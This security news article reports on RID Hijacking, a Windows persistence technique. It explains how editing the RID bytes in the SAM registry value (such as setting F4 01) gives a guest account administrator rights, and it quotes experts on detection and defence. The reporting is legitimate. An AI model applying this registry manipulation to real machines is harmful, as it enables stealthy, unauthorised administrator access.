Security researchers have discovered and created a new post-exploitation technique called RID Hijacking that could allow hackers to assign admin rights to guest accounts on a Windows machine.
According to a blog post by Sebastián Castro at CSL Labs, by using only OS resources, it is possible to hijack the RID of any existing account on the victim (even the 500 Administrator Built-in Account), and assign it to another user account. The hack appears to work on Windows XP, Windows Server 2003, Windows 8.1 and Windows 10.
He said the attack would assign the privileges of the hijacked account to the hijacker account, even if the hijacked account is disabled. It could also allow authentication with the hijacker account credentials (also remotely, depending on machine’s configuration), and obtain authorised access as the hijacked user.
The hack would also register any operation executed on the event log as the hijacked user, despite of being logged in as the hijacker.
The attack uses the Relative Identifier (RID), a component in Windows user accounts. These identifiers are part of Windows’ Security Account Managers (SAMs), which set a user’s permissions.
It hijacks the built-in admin account (RID 500) and assigns it to the built-in guest account (RID 501). The hijack changes registry keys storing this information and adjusts the RID of the guest account to 500, giving it administrator permissions.
"The RID hijack consists on overwriting these bytes by setting the intended RID on the F value at the mentioned offset (i.e. F4 01). Because of an integrity issue, changing this binary will make Windows to assume the identity of the hijacker account as the hijacked one on most of the critical OS processes, giving access as was mentioned above. This can be done not only using the built-in accounts, but also with custom local users," said Castro.
Once this has been done, an attacker can run cmd.exe as an administrator and write to protected folders such as System32.
In a recent presentation on the attack, Castro said the hack was still an issue as Windows "does not check if the RID associated with the user is consistent to the RID copy" and "does not corroborate the RID with the username before creating the access token."
The researcher has also created a Metaspoilt module that automates the attack for penetration testers.
Nicholas Griffin, senior cyber security specialist at Performanta, told SC Media UK that this technique only works if the attacker can already gain system-level privileges, "and if that happens then it’s already game over".
"The key benefit of RID hijacking is that leveraging existing accounts is a lot stealthier than creating a new account or constantly elevating privileges, both of which are more easily detectable. This means that an attacker may remain persistent in the network for longer," he said.
"Defending against this involves a combination of disabling local admin permissions for standard user accounts, keeping up with Windows updates, and deploying a strong endpoint security tool. Forensic endpoint monitoring solutions can detect this technique, or at the very least allow your SOC team to discover it through regular or automated threat hunting."
Leigh-Anne Galloway, cyber security resilience lead at Positive Technologies, told SC Media UK that, with this technique, what’s particularly interesting is that, firstly, in order to work, it doesn’t need to run any exploit. Instead, you only need access to a regedit tool for editing the registry.
"These tools are pretty essential when you have isolated systems - like ICS terminals or ATMs - and it can be very useful for an attacker trying to bypass application control tools (frameworks from major vendors for preventing the launching of malicious software). Secondly, Microsoft’s reaction – or lack thereof – is notable. The company had almost no response to this finding and haven’t fixed it yet, although thankfully no one has detected this technique in the wild so far," she said.